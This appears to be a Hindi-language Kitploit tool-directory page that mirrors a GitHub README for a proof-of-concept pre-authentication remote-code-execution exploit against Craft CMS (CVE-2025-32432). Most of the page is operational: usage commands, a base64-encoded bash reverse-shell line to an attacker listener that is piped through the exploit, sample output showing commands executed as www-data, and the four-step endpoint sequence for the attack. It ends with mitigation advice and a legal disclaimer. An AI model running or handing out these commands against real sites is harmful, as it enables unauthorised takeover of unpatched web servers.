Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-32432 — एक्सप्लॉइट, CVE-2025-32432 के लिए POC, CraftCMS2Shell | Kitploit
उपकरण/GitHubGitHub/c0gnit00/cve-2025-32432
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगपेलोड डेवलपमेंट
GitHubc0gnit00/cve-2025-32432

CVE-2025-32432

एक्सप्लॉइट, CVE-2025-32432 के लिए POC, CraftCMS2Shell

रिपॉजिटरी देखें
321 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-32432 Craft CMS प्री-ऑथ RCE PoC

Craft CMS में क्रिटिकल प्री-ऑथेंटिकेशन रिमोट कोड एक्ज़ीक्यूशन

प्रभावित: Craft CMS 3.x, 4.x, और 5.x (5.6.16 तक)

जानकारी: यह एक्सप्लॉइट HackTheBox Orion मशीन पर परीक्षण किया गया है

अवलोकन

इस रिपॉज़िटरी में CVE-2025-32432 के लिए एक proof-of-concept एक्सप्लॉइट है, जो Craft CMS में एक क्रिटिकल प्री-ऑथेंटिकेशन रिमोट कोड एक्ज़ीक्यूशन भेद्यता है। यह भेद्यता एक बिना प्रमाणीकरण वाले हमलावर को Yii2 के behavior attachment तंत्र और __class override तकनीक के माध्यम से PHP ऑब्जेक्ट इंस्टैंशिएशन का दोहन करके सर्वर पर मनमाना PHP कोड निष्पादित करने की अनुमति देती है।

CVSS स्कोर: 10.0 (क्रिटिकल)

विशेषताएँ

  • प्री-ऑथ एक्सप्लॉइटेशन — कोई लॉगिन क्रेडेंशियल आवश्यक नहीं
  • यूनिवर्सल संगतता — Craft CMS 3.x, 4.x, और 5.x पर कार्य करता है
  • ऑटो एसेट ID डिस्कवरी — मान्य एसेट ID को स्वचालित रूप से brute-force करता है
  • CSRF टोकन निष्कर्षण — Craft CMS CSRF सुरक्षा को स्वचालित रूप से संभालता है
  • सेशन पाथ फ़ॉलबैक — पहला विफल होने पर वैकल्पिक PHP सेशन पाथ को स्वचालित रूप से पुनः प्रयास करता है

आवश्यकताएँ

root@kitploit:~
pip install requests urllib3

त्वरित प्रारंभ

बेसिक कमांड निष्पादन

root@kitploit:~
python3 exploit.py -u http://target.com -c "id"

रिवर्स शेल

root@kitploit:~
# Start listener on your machine
penelope -p 4444

# base64 encode the payload
echo 'exec bash -i >& /dev/tcp/10.10.14.31/4444 0>&1' | base64


# Run exploit
python3 exploit.py -u http://orion.htb -c "echo 'ZXhlYyBiYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjMxLzQ0NDQgMD4mMQo=' | base64 -d | bash"

एसेट ID Brute-Force छोड़ें (यदि ज्ञात हो)

root@kitploit:~
python3 exploit.py -u http://target.com -c "whoami" -a 11

वैकल्पिक सेशन पाथ का उपयोग करें

root@kitploit:~
python3 exploit.py -u http://target.com -c "id" \
  -s "/tmp/sess_{}"

उपयोग

root@kitploit:~
usage: exploit.py [-h] -u URL -c COMMAND [-a ASSET_ID] [-m MAX_ASSET]
                                [-s SESSION_PATH] [-q]

CVE-2025-32432 Craft CMS Pre-Auth RCE Exploit v2

options:
  -h, --help            show this help message and exit
  -u, --url URL         Target URL (e.g., http://target.com)
  -c, --command COMMAND
                        Command to execute
  -a, --asset-id ASSET_ID
                        Known valid asset ID (skip brute-force)
  -m, --max-asset MAX_ASSET
                        Max asset ID to brute-force (default: 300)
  -s, --session-path SESSION_PATH
                        Session file path template (default: /var/lib/php/sessions/sess_{})
  -q, --quiet           Suppress verbose output

उदाहरण आउटपुट

root@kitploit:~
$ python3 exploit.py -u http://orion.htb -c "id"

╔══════════════════════════════════════════════════════════════╗
║  CVE-2025-32432 Craft CMS Pre-Auth RCE PoC v2              ║
║  Target: http://orion.htb                                  ║
║  Command: id                                                  ║
╚══════════════════════════════════════════════════════════════╝

[+] Stage 1: Getting session cookie and CSRF token...
[✓] Session ID: q6458g6g8njeimu59n9l65cu1e
[✓] CSRF Token: ofuxX9FLAA7gSDxLqxYtJGLZVHpPCm...
[+] Stage 2: Poisoning session file with PHP code...
[+] Poison request returned: 200
[✓] Session file poisoned
[+] Stage 3: Brute-forcing asset ID (1-300)...
[✓] Valid asset ID found: 1 (HTTP 200)
[+] Stage 4: Triggering RCE via PhpManager gadget chain...
[+] Target session file: /var/lib/php/sessions/sess_q6458g6g8njeimu59n9l65cu1e
[+] Trigger request returned: 200
[✓] COMMAND OUTPUT:
============================================================
uid=33(www-data) gid=33(www-data) groups=33(www-data)
============================================================

एक्सप्लॉइट चरण

चरणक्रियाएंडपॉइंटप्रमाणीकरण
1सेशन कुकी + CSRF टोकन निकालेंGET /admin/loginनहीं
2सेशन फ़ाइल में PHP पेलोड इंजेक्ट करेंGET /index.php?p=admin/dashboard&a=<PHP>नहीं
3मान्य एसेट ID को brute-force करेंPOST /index.php?p=admin/actions/assets/generate-transformनहीं
4PhpManager गैजेट के माध्यम से RCE ट्रिगर करेंPOST /index.php?p=admin/actions/assets/generate-transform&cmd=<CMD>नहीं

प्रभावित संस्करण

शाखाप्रभावितफिक्स्ड
3.x3.0.0-RC1 – 3.9.143.9.15+
4.x4.0.0-RC1 – 4.14.144.14.15+
5.x5.0.0-RC1 – 5.6.165.6.17+

शमन

  1. तुरंत अपग्रेड करें नवीनतम पैच किए गए संस्करण पर
  2. लॉग की निगरानी करें निम्न के लिए:
    • /admin/actions/assets/generate-transform पर कई POST अनुरोध
    • PHP कोड वाले a= पैरामीटर के साथ एडमिन पेजों पर GET अनुरोध
    • POST अनुरोध बॉडी में as फ़ील्ड की उपस्थिति
  3. WAF नियम सक्षम करें संदिग्ध पैटर्न को ब्लॉक करने के लिए

श्रेय

  • मूल खोज: Orange Cyberdefense / SensePost
  • ब्लॉग पोस्ट: CraftCMS में RCE का उपयोग करने वाले वास्तविक अभियान की जांच
  • PoC लेखक: SensePost के शोध पर आधारित, HTB/पेनेट्रेशन टेस्टिंग के लिए अनुकूलित

अस्वीकरण

यह टूल केवल अधिकृत सुरक्षा परीक्षण और शोध उद्देश्यों के लिए है। कंप्यूटर सिस्टम तक अनधिकृत पहुँच अवैध है। परीक्षण से पहले हमेशा उचित प्राधिकरण प्राप्त करें।

लाइसेंस

MIT लाइसेंस - विवरण के लिए LICENSE फ़ाइल देखें।

टूल डाउनलोड करें